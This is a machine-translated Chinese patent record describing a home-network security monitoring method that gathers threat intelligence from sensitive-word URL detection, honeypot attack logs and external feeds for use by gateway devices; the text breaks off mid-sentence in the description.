Search

CN-116170167-B - Network security monitoring method and device, electronic equipment and storage medium

CN116170167BCN 116170167 BCN116170167 BCN 116170167BCN-116170167-B

Abstract

The application discloses a network security monitoring method which comprises the steps of obtaining security threat information, screening the obtained security threat information based on security requirements of a preset scene to obtain the security threat information aiming at the preset scene, and identifying non-security network access under the preset scene based on the security threat information aiming at the preset scene. The audit also discloses a network security monitoring device, electronic equipment and a storage medium.

Inventors

  • LU YINBING
  • YUAN YONG
  • QIAN CHENG
  • CHEN DONG
  • WANG YUE
  • HE YANG
  • WANG WEIJIE

Assignees

  • 中移(杭州)信息技术有限公司
  • 中国移动通信集团有限公司

Dates

Publication Date
20260508
Application Date
20211125

Claims (18)

  1. 1. A network security monitoring method, comprising: Acquiring security threat information; Screening the acquired security threat information based on the security requirement of a preset scene to obtain the security threat information aiming at the preset scene; identifying non-secure network access under the predetermined scenario based on security threat information for the predetermined scenario; the obtaining security threat information includes: detecting network address information based on the sensitive words, and determining unsafe network address information; acquiring the security threat information based on an attack log recorded by a preset honeypot; acquiring the security threat information provided by an external platform; the screening the security threat information based on the security requirement of the predetermined scene to obtain the security threat information aiming at the predetermined scene includes: Determining a plurality of screening detection items based on the safety requirement of the preset scene, wherein the screening detection items comprise connectivity, ICP record, page completeness, content compliance and detection conditions of a third party detection platform; determining the security threat information which is not detected by at least one screening detection item as the security threat information aiming at the preset scene; Normalizing the security threat information aiming at the preset scene; classifying the security threat information aiming at the preset scene, wherein the types of the security threat information comprise vulnerability security threat information, network threat security threat information, business security threat information and security threat information of other industries/vertical fields.
  2. 2. The method of claim 1, wherein the detecting network address information based on the sensitive word to determine non-secure network address information comprises: acquiring webpage content in a webpage structure corresponding to the network address information to be detected, wherein the webpage content comprises webpage subject content and/or webpage text content; Detecting sensitive words of the webpage content; Carrying out safety identification on the webpage content meeting the detection conditions of the sensitive words by adopting a preset model; And acquiring network address information corresponding to the unsafe webpage content which is determined by the preset model through safety identification.
  3. 3. The method of claim 2, wherein the pre-set model comprises: fasttext natural language processes the NLP model.
  4. 4. The method of claim 1, wherein the obtaining the security threat information based on the attack log of the preset honeypot record comprises: Constructing the honeypot based on a network application environment of the predetermined scene; setting a plurality of honeypots, wherein the geographic position and/or cloud server of each honeypot are not the same; Obtaining attack logs of a plurality of honeypots, And determining the security threat information according to the attack log, wherein the security threat information comprises attack resource information and/or attack mode information.
  5. 5. The method of claim 4, wherein the step of determining the position of the first electrode is performed, The attack resource information comprises a monitoring security shell protocol SSH blasting dictionary, SSH connection client information, virus download distribution server information and remote control address information; The attack mode information comprises attack virus sample information, attack command information and attack influence information.
  6. 6. The method of claim 1, wherein the obtaining the security threat information provided by the external platform comprises: Based on information crawling rules, crawling the security threat information of at least one external platform.
  7. 7. The method according to claim 6, wherein the method comprises, wherein the method further comprises the steps of: The crawling resources for each external platform are configured based on the priority of each external platform.
  8. 8. The method of any of claims 1 to 7, wherein the identifying non-secure network access in the predetermined scenario based on security threat information for the predetermined scenario comprises: And storing the security threat information for the preset scene into gateway equipment, and identifying the non-security network access under the preset scene by the gateway equipment based on the security threat information for the preset scene.
  9. 9. A network security monitoring device, comprising: The acquisition module is used for acquiring the security threat information; the determining module is used for screening the acquired security threat information based on the security requirement of a preset scene to obtain the security threat information aiming at the preset scene; An identification module for identifying non-secure network access in the predetermined scenario based on security threat information for the predetermined scenario; the acquisition module is specifically configured to: detecting network address information based on the sensitive words, and determining unsafe network address information; acquiring the security threat information based on an attack log recorded by a preset honeypot; acquiring the security threat information provided by an external platform; the determining module is specifically configured to: Determining a plurality of screening detection items based on the safety requirement of the preset scene, wherein the screening detection items comprise connectivity, ICP record, page completeness, content compliance and detection conditions of a third party detection platform; determining the security threat information which is not detected by at least one screening detection item as the security threat information aiming at the preset scene; The first processing module is used for carrying out normalization processing on the security threat information aiming at the preset scene; The second processing module is used for classifying the security threat information aiming at the preset scene, wherein the security threat information comprises vulnerability security threat information, network threat security threat information, business security threat information and security threat information of other industries/vertical fields.
  10. 10. The apparatus of claim 9, wherein the obtaining module is specifically configured to: acquiring webpage content in a webpage structure corresponding to the network address information to be detected, wherein the webpage content comprises webpage subject content and/or webpage text content; Detecting sensitive words of the webpage content; Carrying out safety identification on the webpage content meeting the detection conditions of the sensitive words by adopting a preset model; And acquiring network address information corresponding to the unsafe webpage content which is determined by the preset model through safety identification.
  11. 11. The apparatus of claim 10, wherein the predetermined model comprises: fasttext natural language processes the NLP model.
  12. 12. The apparatus of claim 11, wherein the obtaining module is specifically configured to: Constructing the honeypot based on a network application environment of the predetermined scene; setting a plurality of honeypots, wherein the geographic position and/or cloud server of each honeypot are not the same; Obtaining attack logs of a plurality of honeypots, And determining the security threat information according to the attack log, wherein the security threat information comprises attack resource information and/or attack mode information.
  13. 13. The apparatus of claim 12, wherein the device comprises a plurality of sensors, The attack resource information comprises a monitoring security shell protocol SSH blasting dictionary, SSH connection client information, virus download distribution server information and remote control address information; The attack mode information comprises attack virus sample information, attack command information and attack influence information.
  14. 14. The apparatus of claim 9, wherein the obtaining module is specifically configured to: Based on information crawling rules, crawling the security threat information of at least one external platform.
  15. 15. The apparatus of claim 14, wherein the apparatus further comprises: And the configuration module is used for configuring crawling resources for each external platform based on the priority of each external platform.
  16. 16. The device according to any one of claims 9 to 15, wherein the identification module is specifically configured to: And storing the security threat information for the preset scene into gateway equipment, and identifying the non-security network access under the preset scene by the gateway equipment based on the security threat information for the preset scene.
  17. 17. A storage medium storing an executable program which, when executed by a processor, implements the steps of the network security monitoring method of any one of claims 1 to 8.
  18. 18. An electronic device comprising a memory, a processor and an executable program stored on the memory and executable by the processor, wherein the processor performs the steps of the network security monitoring method of any one of claims 1 to 8 when the executable program is run by the processor.

Description

Network security monitoring method and device, electronic equipment and storage medium Technical Field The present invention relates to the field of network security technologies, and in particular, to a network security monitoring method, device, electronic apparatus, and storage medium. Background At present, risks in the field of information security for home scenes include bad information threats, network security threats and the like. Aiming at the threat of bad information, the internet environment is more and more complex, and especially aiming at teenagers, the prevention of network unsafe activities and the like becomes an important problem commonly faced by families. Network unsafe activities jeopardize the physical and mental health of minors. In the aspect of network security protection, the network non-security activity has high failure speed and strong concealment, so that the technical difficulties of infinite layering and difficult discovery and interception exist. Aiming at network security threats, since home network devices such as intelligent home devices and the like mostly comprise technologies such as networks, hardware, cloud services and the like, any security hole can cause sensitive privacy data disclosure through intelligent home products and even externally launch attacks such as distributed denial of service (DDoS) attacks. In the aspect of network security protection, due to the diversity of Trojan virus variants and network attack modes, a user cannot be timely found and informed when equipment is invaded, and the security holes cannot be synchronized at the first time after being revealed. Therefore, how to improve the security of network access for home scenarios is a problem to be solved. Disclosure of Invention The embodiment of the application provides a network security monitoring method, a network security monitoring device, electronic equipment and a storage medium. The technical scheme of the embodiment of the application is realized as follows: according to a first aspect of an embodiment of the present application, there is provided a network security monitoring method, including: Acquiring security threat information; Screening the acquired security threat information based on the security requirement of a preset scene to obtain the security threat information aiming at the preset scene; based on security threat information for the predetermined scenario, non-secure network access under the predetermined scenario is identified. In one embodiment, the acquiring security threat information includes at least one of: detecting network address information based on the sensitive words, and determining unsafe network address information; acquiring the security threat information based on an attack log recorded by a preset honeypot; and acquiring the security threat information provided by the external platform. In one embodiment, the detecting the network address information based on the sensitive word, determining the unsafe network address information includes: acquiring webpage content in a webpage structure corresponding to the network address information to be detected, wherein the webpage content comprises webpage subject content and/or webpage text content; Detecting sensitive words of the webpage content; Carrying out safety identification on the webpage content meeting the detection conditions of the sensitive words by adopting a preset model; And acquiring network address information corresponding to the unsafe webpage content which is determined by the preset model through safety identification. In one embodiment, the preset model includes: fasttext natural language processes the NLP model. In one embodiment, the obtaining the security threat information based on the attack log recorded by the preset honeypot includes: Constructing the honeypot based on a network application environment of the predetermined scene; setting a plurality of honeypots, wherein the geographic position and/or cloud server of each honeypot are not the same; Obtaining attack logs of a plurality of honeypots, And determining the security threat information according to the attack log, wherein the security threat information comprises attack resource information and/or attack mode information. In one embodiment, the attack resource information comprises monitoring a secure shell protocol SSH blasting dictionary, SSH connection client information, virus download distribution server information and remote control address information; The attack mode information comprises attack virus sample information, attack command information and attack influence information. In one embodiment, the obtaining the security threat information provided by the external platform includes: Based on information crawling rules, crawling the security threat information of at least one external platform. In one embodiment, the method further comprises: The crawling resources for each external platform are configu